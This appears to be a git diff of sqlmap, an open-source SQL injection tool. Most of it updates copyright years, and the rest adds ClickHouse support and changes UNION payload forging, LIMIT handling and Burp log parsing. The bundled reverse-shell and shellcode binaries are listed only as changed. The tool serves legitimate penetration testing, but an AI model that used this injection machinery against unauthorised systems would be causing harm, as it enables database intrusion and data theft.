--- a/doc/translations/README-tr-TR.md
+++ b/doc/translations/README-tr-TR.md
@@ -23,7 +23,7 @@ Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayar
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** and **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+sqlmap [Python](https://www.python.org/download/) sitesinde bulunan **2.6**, **2.7** ve **3.x** versiyonları ile bütün platformlarda çalışabilmektedir.
Kullanım
----
diff --git a/extra/__init__.py b/extra/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/__init__.py
+++ b/extra/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/beep/__init__.py
+++ b/extra/beep/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/beep/beep.py b/extra/beep/beep.py
index ad932834021..788bafde1e3 100644
--- a/extra/beep/beep.py
+++ b/extra/beep/beep.py
@@ -3,7 +3,7 @@
"""
beep.py - Make a beep sound
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/cloak/__init__.py
+++ b/extra/cloak/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py
index 77cef7c4219..8f361a0cf39 100644
--- a/extra/cloak/cloak.py
+++ b/extra/cloak/cloak.py
@@ -3,7 +3,7 @@
"""
cloak.py - Simple file encryption/compression utility
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -21,7 +21,7 @@
xrange = range
ord = lambda _: _
-KEY = b"ENWsCymUeJcXqSbD"
+KEY = b"E6wRbVhD0IBeCiGJ"
def xor(message, key):
return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message)))
diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/dbgtool/__init__.py
+++ b/extra/dbgtool/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py
index c8e0c97339c..5443af7bb02 100644
--- a/extra/dbgtool/dbgtool.py
+++ b/extra/dbgtool/dbgtool.py
@@ -3,7 +3,7 @@
"""
dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_
index 0944508047e..a909351bdac 100644
Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ
diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_
index 26448b5dcb1..556eabb7be0 100644
Binary files a/extra/runcmd/runcmd.exe_ and b/extra/runcmd/runcmd.exe_ differ
diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
index 7c19a51b45e..0cbe5404fce 100644
Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ
diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh
index bcc7440aff4..04be57bd931 100755
--- a/extra/shutils/blanks.sh
+++ b/extra/shutils/blanks.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes trailing spaces from blank lines inside project files
diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh
index 9a75fbf2f9e..2195d0a9285 100755
--- a/extra/shutils/drei.sh
+++ b/extra/shutils/drei.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Stress test against Python3
diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py
index 0278b85dc3b..8f09a598a6e 100755
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -1,6 +1,6 @@
#!/usr/bin/env python
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Removes duplicate entries in wordlist like files
diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh
index e3bfc70b96b..30e83527e13 100755
--- a/extra/shutils/junk.sh
+++ b/extra/shutils/junk.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null
diff --git a/extra/shutils/modernize.sh b/extra/shutils/modernize.sh
index e0b5352d892..d4c3da6cd69 100755
--- a/extra/shutils/modernize.sh
+++ b/extra/shutils/modernize.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# sudo pip install modernize
diff --git a/extra/shutils/pycodestyle.sh b/extra/shutils/pycodestyle.sh
index 34d995cde68..f527ed0ce46 100755
--- a/extra/shutils/pycodestyle.sh
+++ b/extra/shutils/pycodestyle.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
diff --git a/extra/shutils/pydiatra.sh b/extra/shutils/pydiatra.sh
index 6f964e74752..474b67a3684 100755
--- a/extra/shutils/pydiatra.sh
+++ b/extra/shutils/pydiatra.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs py3diatra on all python files (prerequisite: pip install pydiatra)
diff --git a/extra/shutils/pyflakes.sh b/extra/shutils/pyflakes.sh
index 9d64d9893dc..f59f5ba7765 100755
--- a/extra/shutils/pyflakes.sh
+++ b/extra/shutils/pyflakes.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
# Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
diff --git a/extra/shutils/pylint.sh b/extra/shutils/pylint.sh
index b8898be2d36..2ba470e177e 100755
--- a/extra/shutils/pylint.sh
+++ b/extra/shutils/pylint.sh
@@ -1,6 +1,6 @@
#!/bin/bash
-# Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
# See the file 'LICENSE' for copying permission
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pylint --rcfile=./.pylintrc '{}' \;
diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh
index 4aed1e72d6e..663a4dc2169 100755
--- a/extra/shutils/pypi.sh
+++ b/extra/shutils/pypi.sh
@@ -16,7 +16,7 @@ cat > $TMP_DIR/setup.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -67,7 +67,7 @@ cat > sqlmap/__init__.py << EOF
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/__init__.py b/extra/vulnserver/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/extra/vulnserver/__init__.py
+++ b/extra/vulnserver/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 76f9c23762a..cfa1d1b2f4a 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -3,7 +3,7 @@
"""
vulnserver.py - Trivial SQLi vulnerable HTTP server (Note: for testing purposes)
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/__init__.py b/lib/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/__init__.py
+++ b/lib/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/controller/__init__.py
+++ b/lib/controller/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/action.py b/lib/controller/action.py
index 1aeb0bcc409..f18795cb250 100644
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index b0d5fd6b51b..186a0fd2767 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -217,6 +217,7 @@ def checkSqlInjection(place, parameter, value):
if _ > 1:
__ = 2 * (_ - 1) + 1 if _ == lower else 2 * _
unionExtended = True
+ test.request._columns = test.request.columns
test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns)
title = re.sub(r"\b%d\b" % _, str(__), title)
test.title = re.sub(r"\b%d\b" % _, str(__), test.title)
@@ -819,6 +820,9 @@ def genCmpPayload():
choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
conf.verbose = int(choice)
setVerbosity()
+ if hasattr(test.request, "columns") and hasattr(test.request, "_columns"):
+ test.request.columns = test.request._columns
+ delattr(test.request, "_columns")
tests.insert(0, test)
elif choice == 'N':
return None
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 2ea81d9c242..cbb8cd78c76 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -512,6 +512,23 @@ def start():
testSqlInj = True
paramKey = (conf.hostname, conf.path, place, parameter)
+ if kb.processUserMarks:
+ if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI):
+ if kb.processNonCustom is None:
+ message = "other non-custom parameters found. "
+ message += "Do you want to process them too? [Y/n/q] "
+ choice = readInput(message, default='Y').upper()
+
+ if choice == 'Q':
+ raise SqlmapUserQuitException
+ else:
+ kb.processNonCustom = choice == 'Y'
+
+ if not kb.processNonCustom:
+ infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+ continue
+
if paramKey in kb.testedParams:
testSqlInj = False
@@ -533,7 +550,7 @@ def start():
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
logger.info(infoMsg)
- elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)):
+ elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I) or re.search(conf.paramExclude, place, re.I)):
testSqlInj = False
infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter)
diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 227a2ceb73f..edece63bce7 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -14,6 +14,7 @@
from lib.core.settings import ACCESS_ALIASES
from lib.core.settings import ALTIBASE_ALIASES
from lib.core.settings import CACHE_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
from lib.core.settings import CRATEDB_ALIASES
from lib.core.settings import CUBRID_ALIASES
from lib.core.settings import DB2_ALIASES
@@ -46,6 +47,8 @@
from plugins.dbms.altibase import AltibaseMap
from plugins.dbms.cache.connector import Connector as CacheConn
from plugins.dbms.cache import CacheMap
+from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
+from plugins.dbms.clickhouse import ClickHouseMap
from plugins.dbms.cratedb.connector import Connector as CrateDBConn
from plugins.dbms.cratedb import CrateDBMap
from plugins.dbms.cubrid.connector import Connector as CubridConn
@@ -122,6 +125,7 @@ def setHandler():
(DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
(DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
(DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
+ (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
(DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
(DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
(DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
diff --git a/lib/core/__init__.py b/lib/core/__init__.py
index 8476fab2f94..7777bded120 100644
--- a/lib/core/__init__.py
+++ b/lib/core/__init__.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 001486101f2..81d24e8b359 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -45,6 +45,7 @@
from lib.core.settings import BOUNDED_BASE64_MARKER
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
+from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
@@ -185,6 +186,11 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N
newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
newValue = self.adjustLateValues(newValue)
+ # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5488
+ if kb.customInjectionMark in origValue:
+ payload = newValue.replace(origValue, "")
+ newValue = origValue.replace(kb.customInjectionMark, payload)
+
# TODO: support for POST_HINT
newValue = "%s%s%s" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER)
@@ -222,7 +228,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N
def _(pattern, repl, string):
retVal = string
match = None
- for match in re.finditer(pattern, string):
+
+ for match in re.finditer(pattern, string or ""):
pass
if match:
@@ -489,7 +496,7 @@ def nullAndCastField(self, field):
if field and Backend.getIdentifiedDbms():
rootQuery = queries[Backend.getIdentifiedDbms()]
- if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast:
+ if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL):
nulledCastedField = field
else:
if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')):
@@ -596,6 +603,9 @@ def getFields(self, query):
if not _:
fieldsSelectFrom = None
+ if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I):
+ fieldsMinMaxstr = None
+
fieldsToCastStr = fieldsNoSelect
if fieldsSubstr:
@@ -881,11 +891,16 @@ def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char,
if element > 0:
unionQuery += ','
- if element == position:
+ if conf.uValues and conf.uValues.count(',') + 1 == count:
+ unionQuery += conf.uValues.split(',')[element]
+ elif element == position:
unionQuery += query
else:
unionQuery += char
+ if conf.uValues:
+ unionQuery = unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query)
+
if fromTable and not unionQuery.endswith(fromTable):
unionQuery += fromTable
@@ -1016,16 +1031,16 @@ def limitQuery(self, num, query, field=None, uniqueField=None):
fromFrom = limitedQuery[fromIndex + 1:]
orderBy = None
- if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.RAIMA):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.DERBY):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
- elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,):
- limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
+ elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
limitedQuery += " %s" % limitStr
- elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB):
- limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
+ elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,):
+ limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO):
diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 3cccd2d1ec6..2fabc7087ae 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/common.py b/lib/core/common.py
index a691edc2ac3..e76521dd3ca 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -1769,7 +1769,7 @@ def parseTargetUrl():
errMsg = "invalid target URL port (%d)" % conf.port
raise SqlmapSyntaxException(errMsg)
- conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
+ conf.url = getUnicode("%s://%s%s%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, (":%d" % conf.port) if not (conf.port == 80 and conf.scheme == "http" or conf.port == 443 and conf.scheme == "https") else "", conf.path))
conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
if urlSplit.query:
@@ -3182,7 +3182,14 @@ def isNumPosStrValue(value):
False
"""
- return ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
+ retVal = False
+
+ try:
+ retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT
+ except ValueError:
+ pass
+
+ return retVal
@cachedmethod
def aliasToDbmsEnum(dbms):
@@ -3861,6 +3868,10 @@ def checkIntegrity():
logger.error("wrong modification time of '%s'" % filepath)
retVal = False
+ suffix = extractRegexResult(r"#(?P\w+)", VERSION_STRING)
+ if suffix and suffix not in {"dev", "stable"}:
+ retVal = False
+
return retVal
def getDaysFromLastUpdate():
@@ -4940,6 +4951,12 @@ def decodeDbmsHexValue(value, raw=False):
>>> decodeDbmsHexValue('3132332031') == u'123 1'
True
+ >>> decodeDbmsHexValue('31003200330020003100') == u'123 1'
+ True
+ >>> decodeDbmsHexValue('00310032003300200031') == u'123 1'
+ True
+ >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1'
+ True
>>> decodeDbmsHexValue('313233203') == u'123 ?'
True
>>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']
@@ -4978,6 +4995,9 @@ def _(value):
if not isinstance(retVal, six.text_type):
retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)
+ if u"\x00" in retVal:
+ retVal = retVal.replace(u"\x00", u"")
+
return retVal
try:
@@ -5066,6 +5086,7 @@ def resetCookieJar(cookieJar):
logger.info(infoMsg)
content = readCachedFileContent(conf.loadCookies)
+ content = re.sub("(?im)^#httpOnly_", "", content)
lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#'))
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR)
os.close(handle)
@@ -5327,6 +5348,7 @@ def _parseBurpLog(content):
continue
getPostReq = False
+ forceBody = False
url = None
host = None
method = None
@@ -5347,7 +5369,7 @@ def _parseBurpLog(content):
line = line.strip('\r')
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
- if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
+ if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
data = ""
params = True
@@ -5384,16 +5406,18 @@ def _parseBurpLog(content):
elif key.upper() == HTTP_HEADER.HOST.upper():
if '://' in value:
scheme, value = value.split('://')[:2]
- splitValue = value.split(":")
- host = splitValue[0]
- if len(splitValue) > 1:
- port = filterStringValue(splitValue[1], "[0-9]")
+ port = extractRegexResult(r":(?P\d+)\Z", value)
+ if port:
+ value = value[:-(1 + len(port))]
+
+ host = value
# Avoid to add a static content length header to
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
+ forceBody = True
params = True
# Avoid proxy and connection type related headers
diff --git a/lib/core/compat.py b/lib/core/compat.py
index 851e57eb87d..629c844b08a 100644
--- a/lib/core/compat.py
+++ b/lib/core/compat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/convert.py b/lib/core/convert.py
index c6f86aa1fe1..2a211125ae3 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -16,6 +16,7 @@
import json
import re
import sys
+import time
from lib.core.bigarray import BigArray
from lib.core.compat import xrange
@@ -134,6 +135,23 @@ def dejsonize(data):
return json.loads(data)
+def rot13(data):
+ """
+ Returns ROT13 encoded/decoded text
+
+ >>> rot13('foobar was here!!')
+ 'sbbone jnf urer!!'
+ >>> rot13('sbbone jnf urer!!')
+ 'foobar was here!!'
+ """
+
+ # Reference: https://stackoverflow.com/a/62662878
+ retVal = ""
+ alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
+ for char in data:
+ retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char
+ return retVal
+
def decodeHex(value, binary=True):
"""
Returns a decoded representation of provided hexadecimal value
@@ -334,6 +352,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
True
"""
+ # Best position for --time-limit mechanism
+ if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit):
+ raise SystemExit
+
if noneToNull and value is None:
return NULL
diff --git a/lib/core/data.py b/lib/core/data.py
index c2b4325d719..668483495dc 100644
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index eadcb9cf7ab..d595f905d7d 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -49,6 +49,19 @@ def __getattr__(self, item):
else:
return None
+ def __delattr__(self, item):
+ """
+ Deletes attributes
+ """
+
+ try:
+ return self.pop(item)
+ except KeyError:
+ if self.keycheck:
+ raise AttributeError("unable to access item '%s'" % item)
+ else:
+ return None
+
def __setattr__(self, item, value):
"""
Maps attributes to values
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 433ae3f959b..d2e7f4715d8 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index 54410f6dbf6..4ae9c89471c 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 157adc2aded..531ef10284f 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -38,6 +38,7 @@
from lib.core.settings import SYBASE_ALIASES
